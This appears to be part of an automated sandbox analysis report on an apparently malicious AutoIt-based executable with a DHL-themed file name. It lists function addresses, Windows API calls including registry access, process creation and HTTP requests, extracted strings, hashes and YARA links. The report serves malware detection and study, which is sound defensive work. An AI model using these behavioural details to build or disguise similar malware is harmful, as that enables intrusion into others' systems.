                                                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                            • API String ID: 1256254125-909552448
                                                                                            • Opcode ID: 7172912a2b4a9fb22247f9ca502a4857b0755248508e4b8e8eb0a305dcfd5428
                                                                                            • Instruction ID: b930ebf7adfac22819056f42f4db287908aec2c9c93ea5e154a798e8c5470e3d
                                                                                            • Opcode Fuzzy Hash: 7172912a2b4a9fb22247f9ca502a4857b0755248508e4b8e8eb0a305dcfd5428
                                                                                            • Instruction Fuzzy Hash: 5F71047260017A8BEB20DE7CCC416BA3791FB62764F150124F866DB694EA35DD86C3A1
                                                                                            Function 008B833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _wcslen.LIBCMT ref: 008B835A
                                                                                            • _wcslen.LIBCMT ref: 008B836E
                                                                                            • _wcslen.LIBCMT ref: 008B8391
                                                                                            • _wcslen.LIBCMT ref: 008B83B4
                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 008B83F2
                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,008B5BF2), ref: 008B844E
                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 008B8487
                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 008B84CA
                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 008B8501
                                                                                            • FreeLibrary.KERNEL32(?), ref: 008B850D
                                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 008B851D
                                                                                            • DestroyIcon.USER32(?,?,?,?,?,008B5BF2), ref: 008B852C
                                                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 008B8549
                                                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 008B8555
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                            • String ID: .dll$.exe$.icl
                                                                                            • API String ID: 799131459-1154884017
                                                                                            • Opcode ID: 1bbf9f903b5af504b2616683eca62b30f2862d3c88fc23142b3cf51aeb7bc313
                                                                                            • Instruction ID: d470b8a6e70f11fde956a4c7f0893289102f5176856fb012347db9a1bbe43ede
                                                                                            • Opcode Fuzzy Hash: 1bbf9f903b5af504b2616683eca62b30f2862d3c88fc23142b3cf51aeb7bc313
                                                                                            • Instruction Fuzzy Hash: CC619D71540619FAEB24DF68DC81BFE7BACFB08B11F104609F815D62D1DB74A980DBA0
                                                                                            Function 00827778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                            • API String ID: 0-1645009161
                                                                                            • Opcode ID: fc4737c1e403eff147373dc5c2ba30800057a06a0ef16627d07df17c2329a908
                                                                                            • Instruction ID: a552580d651358feb62bc8fcb35d37cfda243ecef22123fc14bbe316d16d0474
                                                                                            • Opcode Fuzzy Hash: fc4737c1e403eff147373dc5c2ba30800057a06a0ef16627d07df17c2329a908
                                                                                            • Instruction Fuzzy Hash: 7E81E871604229BFDB20AF65EC52FAE37A8FF55300F044025F905EA296EB74DA91C792
                                                                                            Function 00885A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadIconW.USER32(00000063), ref: 00885A2E
                                                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00885A40
                                                                                            • SetWindowTextW.USER32(?,?), ref: 00885A57
                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00885A6C
                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00885A72
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00885A82
                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00885A88
                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00885AA9
                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00885AC3
                                                                                            • GetWindowRect.USER32(?,?), ref: 00885ACC
                                                                                            • _wcslen.LIBCMT ref: 00885B33
                                                                                            • SetWindowTextW.USER32(?,?), ref: 00885B6F
                                                                                            • GetDesktopWindow.USER32 ref: 00885B75
                                                                                            • GetWindowRect.USER32(00000000), ref: 00885B7C
                                                                                            • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00885BD3
                                                                                            • GetClientRect.USER32(?,?), ref: 00885BE0
                                                                                            • PostMessageW.USER32(?,00000005,00000000,?), ref: 00885C05
                                                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00885C2F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                            • String ID:
                                                                                            • API String ID: 895679908-0
                                                                                            • Opcode ID: 31e48a402912ec5e4bfd4b099de07462d1567aafe14a97143365035b442fb64f
                                                                                            • Instruction ID: b975a944554a171d4eb05ad739750de09c4b4ddd24c8ef03257936ab651b85df
                                                                                            • Opcode Fuzzy Hash: 31e48a402912ec5e4bfd4b099de07462d1567aafe14a97143365035b442fb64f
                                                                                            • Instruction Fuzzy Hash: 67716E31900B09AFDB20EFA8CE85EAEBBF5FF58714F104618E582E65A0D775E944CB50
                                                                                            Function 008400C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 008400C6
                                                                                              • Part of subcall function 008400ED: InitializeCriticalSectionAndSpinCount.KERNEL32(008F070C,00000FA0,AF9074CE,?,?,?,?,008623B3,000000FF), ref: 0084011C
                                                                                              • Part of subcall function 008400ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,008623B3,000000FF), ref: 00840127
                                                                                              • Part of subcall function 008400ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,008623B3,000000FF), ref: 00840138
                                                                                              • Part of subcall function 008400ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0084014E
                                                                                              • Part of subcall function 008400ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0084015C
                                                                                              • Part of subcall function 008400ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0084016A
                                                                                              • Part of subcall function 008400ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00840195
                                                                                              • Part of subcall function 008400ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 008401A0
                                                                                            • ___scrt_fastfail.LIBCMT ref: 008400E7
                                                                                              • Part of subcall function 008400A3: __onexit.LIBCMT ref: 008400A9
                                                                                            Strings
                                                                                            • kernel32.dll, xrefs: 00840133
                                                                                            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00840122
                                                                                            • InitializeConditionVariable, xrefs: 00840148
                                                                                            • WakeAllConditionVariable, xrefs: 00840162
                                                                                            • SleepConditionVariableCS, xrefs: 00840154
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                            • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                            • API String ID: 66158676-1714406822
                                                                                            • Opcode ID: 5b88fa48070d0b560962a3f4cd85c14d51d054ab033ec0c98aafc074c3e23b40
                                                                                            • Instruction ID: e9ff88985b9e71ec2c17fae6b322d3a94541e2b4653fc1466cdab484c8095310
                                                                                            • Opcode Fuzzy Hash: 5b88fa48070d0b560962a3f4cd85c14d51d054ab033ec0c98aafc074c3e23b40
                                                                                            • Instruction Fuzzy Hash: 6021F932A447186FD7106B78AC45B6B37D8FB44B51F040639FB11E6393DB7898008EA1
                                                                                            Function 008830F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen
                                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                            • API String ID: 176396367-1603158881
                                                                                            • Opcode ID: 888508e003491c5539d1ddaa371dd190424a0e2e64f8283781e255a55c758128
                                                                                            • Instruction ID: ec6935ed2f3a57fbd0a3f87d07969f55b38f12d450ff15b83784883508782707
                                                                                            • Opcode Fuzzy Hash: 888508e003491c5539d1ddaa371dd190424a0e2e64f8283781e255a55c758128
                                                                                            • Instruction Fuzzy Hash: 0DE1E631A0052AABCB18EFA8C4517EEBBB0FF54B14F548129E456F7240DB70AF858790
                                                                                            Function 008944C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CharLowerBuffW.USER32(00000000,00000000,008BCC08), ref: 00894527
                                                                                            • _wcslen.LIBCMT ref: 0089453B
                                                                                            • _wcslen.LIBCMT ref: 00894599
                                                                                            • _wcslen.LIBCMT ref: 008945F4
                                                                                            • _wcslen.LIBCMT ref: 0089463F
                                                                                            • _wcslen.LIBCMT ref: 008946A7
                                                                                              • Part of subcall function 0083F9F2: _wcslen.LIBCMT ref: 0083F9FD
                                                                                            • GetDriveTypeW.KERNEL32(?,008E6BF0,00000061), ref: 00894743
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen$BuffCharDriveLowerType
                                                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                            • API String ID: 2055661098-1000479233
                                                                                            • Opcode ID: 079027668007a583b25529f7075c169777fd312c2931a535943c60ab34967418
                                                                                            • Instruction ID: b0e1aeea75d2da7f2cb62a8f9f86ae9ea9e0f1789139cdd22a49db5c3f94c6ba
                                                                                            • Opcode Fuzzy Hash: 079027668007a583b25529f7075c169777fd312c2931a535943c60ab34967418
                                                                                            • Instruction Fuzzy Hash: C8B122716083029FCB10EF28C890E6AB7E5FFA5764F18591CF496C7291E730D886CB92
                                                                                            Function 008AAFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _wcslen.LIBCMT ref: 008AB198
                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 008AB1B0
                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 008AB1D4
                                                                                            • _wcslen.LIBCMT ref: 008AB200
                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008AB214
                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008AB236
                                                                                            • _wcslen.LIBCMT ref: 008AB332
                                                                                              • Part of subcall function 008905A7: GetStdHandle.KERNEL32(000000F6), ref: 008905C6
                                                                                            • _wcslen.LIBCMT ref: 008AB34B
                                                                                            • _wcslen.LIBCMT ref: 008AB366
                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 008AB3B6
                                                                                            • GetLastError.KERNEL32(00000000), ref: 008AB407
                                                                                            • CloseHandle.KERNEL32(?), ref: 008AB439
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 008AB44A
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 008AB45C
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 008AB46E
                                                                                            • CloseHandle.KERNEL32(?), ref: 008AB4E3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                            • String ID:
                                                                                            • API String ID: 2178637699-0
                                                                                            • Opcode ID: 8604b2cb9aa38de834231cae5d2119753c075aaba9f3043645bcf2aab765029c
                                                                                            • Instruction ID: 395e69764b5b5e5b084c35b6bdcb7e3c48d770246e33fec36ef6fb9a77184055
                                                                                            • Opcode Fuzzy Hash: 8604b2cb9aa38de834231cae5d2119753c075aaba9f3043645bcf2aab765029c
                                                                                            • Instruction Fuzzy Hash: E0F179315082509FDB14EF28D891B6ABBE5FF86314F14855DF899DB2A2DB31EC40CB92
                                                                                            Function 0082326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetMenuItemCount.USER32(008F1990), ref: 00862F8D
                                                                                            • GetMenuItemCount.USER32(008F1990), ref: 0086303D
                                                                                            • GetCursorPos.USER32(?), ref: 00863081
                                                                                            • SetForegroundWindow.USER32(00000000), ref: 0086308A
                                                                                            • TrackPopupMenuEx.USER32(008F1990,00000000,?,00000000,00000000,00000000), ref: 0086309D
                                                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 008630A9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                            • String ID: 0
                                                                                            • API String ID: 36266755-4108050209
                                                                                            • Opcode ID: cd4b046b34313598aa8729cf2332c79322b9e582de697fa3ecd308c3df740b84
                                                                                            • Instruction ID: 4d36d9266eed3826280305fc2a3ff7a4541b352b459f6e14514f47cbbf3e33e0
                                                                                            • Opcode Fuzzy Hash: cd4b046b34313598aa8729cf2332c79322b9e582de697fa3ecd308c3df740b84
                                                                                            • Instruction Fuzzy Hash: A2714970640615BFEB319F28DC59FAABF69FF05324F200216F524EA1E1CBB1A950CB91
                                                                                            Function 008B6CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DestroyWindow.USER32(?,?), ref: 008B6DEB
                                                                                              • Part of subcall function 00826B57: _wcslen.LIBCMT ref: 00826B6A
                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 008B6E5F
                                                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 008B6E81
                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 008B6E94
                                                                                            • DestroyWindow.USER32(?), ref: 008B6EB5
                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00820000,00000000), ref: 008B6EE4
                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 008B6EFD
                                                                                            • GetDesktopWindow.USER32 ref: 008B6F16
                                                                                            • GetWindowRect.USER32(00000000), ref: 008B6F1D
                                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 008B6F35
                                                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 008B6F4D
                                                                                              • Part of subcall function 00839944: GetWindowLongW.USER32(?,000000EB), ref: 00839952
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                            • String ID: 0$tooltips_class32
                                                                                            • API String ID: 2429346358-3619404913
                                                                                            • Opcode ID: 5c908e60ee56db38296b7cd67abb62807e60484429db0af0479bafc4abf2b0be
                                                                                            • Instruction ID: 4243e86b87fe9d0374ae784c242b4c81d9381f4d5f355739296737a475e80b91
                                                                                            • Opcode Fuzzy Hash: 5c908e60ee56db38296b7cd67abb62807e60484429db0af0479bafc4abf2b0be
                                                                                            • Instruction Fuzzy Hash: 5A717571604244AFDB20CF28D848EBABBE9FB99304F54051DF989C7360EB74E915CB12
                                                                                            Function 008B911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00839BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00839BB2
                                                                                            • DragQueryPoint.SHELL32(?,?), ref: 008B9147
                                                                                              • Part of subcall function 008B7674: ClientToScreen.USER32(?,?), ref: 008B769A
                                                                                              • Part of subcall function 008B7674: GetWindowRect.USER32(?,?), ref: 008B7710
                                                                                              • Part of subcall function 008B7674: PtInRect.USER32(?,?,008B8B89), ref: 008B7720
                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 008B91B0
                                                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 008B91BB
                                                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 008B91DE
                                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 008B9225
                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 008B923E
                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 008B9255
                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 008B9277
                                                                                            • DragFinish.SHELL32(?), ref: 008B927E
                                                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 008B9371
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                            • API String ID: 221274066-3440237614
                                                                                            • Opcode ID: ee727764eb3a60173023def158e11665e10a40add2467ccedd0168e6985cec10
                                                                                            • Instruction ID: 882b07c7f91c6c80dbae6145a078486756178aa71cc5a1735179e0997911e313
                                                                                            • Opcode Fuzzy Hash: ee727764eb3a60173023def158e11665e10a40add2467ccedd0168e6985cec10
                                                                                            • Instruction Fuzzy Hash: 6D614971108305AFD701DF64D885DABBBE8FF99750F000A2DF695922A1DB709A49CB62
                                                                                            Function 0089C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0089C4B0
                                                                                            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0089C4C3
                                                                                            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0089C4D7
                                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0089C4F0
                                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0089C533
                                                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0089C549
                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0089C554
                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0089C584
                                                                                            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0089C5DC
                                                                                            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0089C5F0
                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0089C5FB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                            • String ID:
                                                                                            • API String ID: 3800310941-3916222277
                                                                                            • Opcode ID: 9b39e60eb03b45ef0bb432e5e3b4f3f512c576fc48c6ee02d4a11269c5563832
                                                                                            • Instruction ID: b9b0d112cd42726212ff6e5d88bf696f3729ef6a9e9e2614ace195a0aa8da9de
                                                                                            • Opcode Fuzzy Hash: 9b39e60eb03b45ef0bb432e5e3b4f3f512c576fc48c6ee02d4a11269c5563832
                                                                                            • Instruction Fuzzy Hash: 1A516CB0600208BFEF21AF65C988AAB7BFCFF08744F044519F946D6610DB72E944DBA1
                                                                                            Function 008B856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
